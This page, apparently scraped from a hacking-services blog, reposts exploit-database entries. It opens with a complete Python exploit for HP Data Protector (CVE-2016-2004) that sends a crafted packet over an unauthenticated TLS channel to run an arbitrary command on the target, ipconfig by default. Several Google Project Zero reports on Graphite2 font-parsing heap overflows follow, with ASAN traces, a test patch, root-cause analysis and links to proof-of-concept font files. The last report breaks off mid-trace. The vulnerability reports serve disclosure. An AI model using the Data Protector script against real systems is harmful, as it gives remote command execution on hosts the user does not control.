#!/usr/bin/python
#
# Exploit Title: Data Protector Encrypted Communications
# Date: 26-05-2016
# Exploit Author: Ian Lovering
# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/
# Version: A.09.00 and earlier
# Tested on: Windows Server 2008
# CVE : CVE-2016-2004
#
# This proof of concept demonstrates that enabling encrypted control communication on
# Data Protector agents does not provide any additional security.
# As is provides no authentication it is not a viable workaround to prevent the
# exploitation of well known Data Protector issues such as cve-2014-2623
#
# This exploit establishes and unauthenticated encrypted communication channel to
# a Data Protector Agent and uses a well known unencrypted Data Protector vulnerability
# to run arbitrary commands on the target.
# Tested on Kali Linux 2 with python 2.7.9
# Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control
# communication enabled.
# All other Data Protector settings are default.
# Tested against Data Protector agent running on Windows 2008 R2
# Also tested against Data Protector A.07
#
# encrypted-dataprotector.py -e <ipaddress>
#
# By default runs ipconfig on the target.
# Can take a little while to return. Have patience ;)
#
# CVE-2016-2004
import socket
import ssl
import time
import struct
import argparse
parser = argparse.ArgumentParser(prog='test-encrypt.py')
parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true')
parser.add_argument('-p', '--port', type=int)
parser.add_argument('-c', '--command')
parser.add_argument('ipaddress')
parser.set_defaults(encrypt=False,port=5555)
args = parser.parse_args()
HOST = args.ipaddress
PORT = args.port
command = 'ipconfig'
if args.command:
command = args.command
# initialise data
initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00"
"\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00"
"\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00"
"\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00"
"\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00")
OFFSET = 46
command = command.replace("\\", "\\\\")
command = command.replace("\'", "\\\'")
command_length = struct.pack(">I",OFFSET + len(command))
payload = command_length +\
"\x32\x00\x01\x01\x01\x01\x01\x01" +\
"\x00\x01\x00\x01\x00\x01\x00\x01" +\
"\x01\x00\x20\x32\x38\x00\x5c\x70" +\
"\x65\x72\x6c\x2e\x65\x78\x65\x00" +\
"\x20\x2d\x65\x73\x79\x73\x74\x65" +\
"\x6d('%s')\x00" % command
def get_data(sock):
response = ''
recv_len =1
while recv_len:
data = sock.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
return response
def get_dp_response(sock):
print "===== Response ====="
print
while True:
# Get information about response
packed_length = sock.recv(4)
if not packed_length:
break
n = struct.unpack(">I", packed_length)[0]
tmpresponse = sock.recv(n)
tmpresponse = tmpresponse.replace("\n", "")
tmpresponse = tmpresponse.replace("\x00", "")
tmpresponse = tmpresponse.replace("\xff\xfe\x39\x20", "")
if tmpresponse.upper().find("*RETVAL*") != -1:
break
else:
print tmpresponse
print
print "===== End ====="
print
client = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
if args.encrypt:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
context.set_ciphers('ALL')
try:
client.connect(( HOST, PORT ))
print "Connected"
if args.encrypt:
# send data protector init string
client.send(initdata)
response = get_data(client)
# setup tls
client = context.wrap_socket(client)
print "Encryption Enabled"
# send payload
client.send(payload)
print "Sent Payload"
print ""
print "===== Command ====="
print
print command
print
get_dp_response(client)
client.close()
except Exception as e:
print '[*] Exception. Exiting.'
print e
client.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863287833
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=749
The following crash due to a heap-based buffer overflow can be observed in a slightly modified ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file text
My change in gr2FontTest was to hardcode the tested text to include all characters in the 0x1..0xfff range, instead of having to specify them in command line. The patch is as follows:
--- cut ---
--- graphite_original/gr2fonttest/gr2FontTest.cpp 2016-02-27 19:35:16.308071127 +0100
+++ graphite/gr2fonttest/gr2FontTest.cpp 2016-02-26 13:57:13.389186376 +0100
@@ -437,7 +437,17 @@
if (mainArgOffset < 1) argError = true;
else if (mainArgOffset > 1)
{
- if (!useCodes && pText != NULL)
+ const unsigned int kCodeLimit = 0x1000;
+
+ charLength = kCodeLimit - 1;
+
+ pText32 = (unsigned int *)malloc(sizeof(unsigned int) * kCodeLimit);
+ for (unsigned int i = 1; i < kCodeLimit; ++i) {
+ pText32[i - 1] = i;
+ }
+ pText32[kCodeLimit - 1] = 0;
+
+ /*if (!useCodes && pText != NULL)
{
charLength = convertUtf<gr2::utf8>(pText, pText32);
if (!pText32)
@@ -466,7 +476,7 @@
{
pText32[charLength] = 0;
fprintf(log, "\n");
- }
+ }*/
}
return (argError) ? false : true;
}
--- cut ---
The resulting ASAN crash is as follows:
--- cut ---
==27575==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x00000055daad bp 0x7ffdfb0bfe90 sp 0x7ffdfb0bfe88
WRITE of size 8 at 0x60200000efd0 thread T0
#0 0x55daac in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:133:20
#1 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#2 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#3 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#4 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#5 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193)
#6 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595)
0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
allocated by thread T0 here:
#0 0x4b86dc in calloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:56
#1 0x56ac8a in graphite2::GlyphFace const** graphite2::grzeroalloc<graphite2::GlyphFace const*>(unsigned long) graphite/src/./inc/Main.h:96:28
#2 0x55cb26 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:119:45
#3 0x549503 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#4 0x56d3f4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#5 0x56cf04 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#6 0x56f240 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#7 0x4ec193 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ec193)
#8 0x4ef595 in main (graphite/gr2fonttest/gr2fonttest+0x4ef595)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/GlyphCache.cpp:133:20 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int)
Shadow bytes around the buggy address:
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9df0: fa fa 00 fa fa fa 01 fa fa fa[01]fa fa fa 00 04
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==27575==ABORTING
--- cut ---
A cursory analysis shows that the direct reason of the crash is the wrong assumption made by GlyphCache::GlyphCache() that the _num_glyphs field is always greater than 0. A buffer is allocated in line 128:
--- cut ---
128 GlyphFace * const glyphs = new GlyphFace [_num_glyphs];
--- cut ---
And regardless of the _num_glyphs value, data is written to its first entry in line 133:
--- cut ---
132 // The 0 glyph is definately required.
133 _glyphs[0] = _glyph_loader->read_glyph(0, glyphs[0], &numsubs);
--- cut ---
While this could just end as an off-by-one error and a fixed ~8 byte overflow, it gets worse. The subsequent loop in lines 139-140 also assumes that _num_glyphs is non-zero, and additionally wrongly (in the context of the misassumption) uses the != operator instead of < in the loop end condition:
--- cut ---
138 const GlyphFace * loaded = _glyphs[0];
139 for (uint16 gid = 1; loaded && gid != _num_glyphs; ++gid)
140 _glyphs[gid] = loaded = _glyph_loader->read_glyph(gid, glyphs[gid], &numsubs);
--- cut ---
This essentially means that the size of the overflown area is fully controlled by an attacker; it must only be a multiple of the native word size: typically 4 or 8 bytes.
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1251869. Attached are three font files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39859.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=751
The following crashes due to two different heap-based buffer overreads can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
While we have seen the crashes to occur with six unique call stacks, eventually the OOB reads happen at two code locations: graphite2::GlyphCache::Loader::Loader (graphite/src/GlyphCache.cpp:306:38) and graphite2::GlyphCache::Loader::read_glyph (graphite/src/GlyphCache.cpp:398:27). Below you can see the ASAN reports of crashes in both functions:
--- cut ---
=================================================================
==26347==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000bf40 at pc 0x00000055445d bp 0x7ffe231e8130 sp 0x7ffe231e8128
READ of size 1 at 0x60c00000bf40 thread T0
#0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#2 0x551eab in unsigned short be::read<unsigned short>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#3 0x562a66 in graphite2::GlyphCache::Loader::read_glyph(unsigned short, graphite2::GlyphFace&, int*) const graphite/src/GlyphCache.cpp:398:27
#4 0x560481 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:142:37
#5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
0x60c00000bf40 is located 0 bytes to the right of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36
#3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24
#4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21
#5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c187fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c187fff97e0: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
0x0c187fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07
0x0c187fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26347==ABORTING
--- cut ---
--- cut ---
=================================================================
==26561==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efb7 at pc 0x00000055445d bp 0x7ffc518d4260 sp 0x7ffc518d4258
READ of size 1 at 0x60200000efb7 thread T0
#0 0x55445c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x5543c8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#2 0x554358 in unsigned long be::_peek<4>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#3 0x551d6b in unsigned int be::read<unsigned int>(unsigned char const*&) graphite/src/./inc/Endian.h:60:23
#4 0x5685a5 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:306:38
#5 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21
#6 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#7 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#8 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#9 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#10 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#11 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
0x60200000efb7 is located 0 bytes to the right of 7-byte region [0x60200000efb0,0x60200000efb7)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36
#3 0x567867 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&, bool) graphite/src/GlyphCache.cpp:268:24
#4 0x55ef50 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&, unsigned int) graphite/src/GlyphCache.cpp:118:21
#5 0x54bb13 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:98:29
#6 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#7 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#8 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#9 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#10 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9df0: fa fa fa fa fa fa[07]fa fa fa 06 fa fa fa 00 04
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==26561==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252406. Attached is an archive with three font files per each unique crash (in terms of stack trace). There are two directories with reproducers for the graphite2::GlyphCache::Loader::read_glyph crash and four directories with reproducers for graphite2::GlyphCache::Loader::Loader.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39860.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=752
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
=================================================================
==27862==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61200000be45 at pc 0x0000005f3354 bp 0x7ffe1a7ac5b0 sp 0x7ffe1a7ac5a8
READ of size 4 at 0x61200000be45 thread T0
#0 0x5f3353 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*) graphite/src/TtfUtil.cpp:1092:40
#1 0x4fa415 in smp_subtable(graphite2::Face::Table const&) graphite/src/CmapCache.cpp:55:9
#2 0x4fa859 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:95:29
#3 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#4 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#5 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#6 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#7 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#8 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
0x61200000be45 is located 1 bytes to the right of 260-byte region [0x61200000bd40,0x61200000be44)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55dc0b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f8b1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:280:36
#3 0x4fa793 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54bf42 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56fb34 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f644 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571980 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ecf13 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ecf13)
#9 0x4f0387 in main (graphite/gr2fonttest/gr2fonttest+0x4f0387)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/TtfUtil.cpp:1092:40 in graphite2::TtfUtil::CheckCmapSubtable12(void const*, void const*)
Shadow bytes around the buggy address:
0x0c247fff9770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff97a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c247fff97c0: 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa fa
0x0c247fff97d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c247fff97e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c247fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
0x0c247fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c247fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==27862==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1252411. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39861.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=755
The following crash due to a heap-based buffer overread can be observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest /path/to/file -auto
--- cut ---
==19167==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dff1 at pc 0x000000553c7d bp 0x7ffc6c2c7100 sp 0x7ffc6c2c70f8
READ of size 1 at 0x60e00000dff1 thread T0
#0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
#1 0x553be8 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:43
#2 0x56d7e3 in unsigned short be::peek<unsigned short>(void const*) graphite/src/./inc/Endian.h:55:18
#3 0x5f2bad in graphite2::TtfUtil::CmapSubtable4NextCodepoint(void const*, unsigned int, int*) graphite/src/TtfUtil.cpp:1042:16
#4 0x4fce35 in bool cache_subtable<&graphite2::TtfUtil::CmapSubtable4NextCodepoint, &graphite2::TtfUtil::CmapSubtable4Lookup>(unsigned short**, void const*, unsigned int) graphite/src/CmapCache.cpp:65:33
#5 0x4fb097 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:107:14
#6 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#7 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#8 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#9 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#10 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#11 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
0x60e00000dff1 is located 0 bytes to the right of 145-byte region [0x60e00000df60,0x60e00000dff1)
allocated by thread T0 here:
#0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x55d42b in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) graphite/src/FileFace.cpp:94:11
#2 0x54f0d1 in graphite2::Face::Table::Table(graphite2::Face const&, graphite2::TtfUtil::Tag, unsigned int) graphite/src/Face.cpp:281:36
#3 0x4faad3 in graphite2::CachedCmap::CachedCmap(graphite2::Face const&) graphite/src/CmapCache.cpp:91:23
#4 0x54b6d2 in graphite2::Face::readGlyphs(unsigned int) graphite/src/Face.cpp:108:22
#5 0x56f5d4 in (anonymous namespace)::load_face(graphite2::Face&, unsigned int) graphite/src/gr_face.cpp:54:14
#6 0x56f0e4 in gr_make_face_with_ops graphite/src/gr_face.cpp:89:16
#7 0x571420 in gr_make_file_face graphite/src/gr_face.cpp:242:23
#8 0x4ed0b3 in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed0b3)
#9 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9)
SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*)
Shadow bytes around the buggy address:
0x0c1c7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9be0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c1c7fff9bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[01]fa
0x0c1c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff9c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==19167==ABORTING
--- cut ---
The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. Attached are three font files which reproduce the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39862.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756
We have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command:
$ ./gr2fonttest -demand -cache /path/to/file
Below are three unique ASAN reports that we have triggered.
--- cut ---
==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0)
#0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73
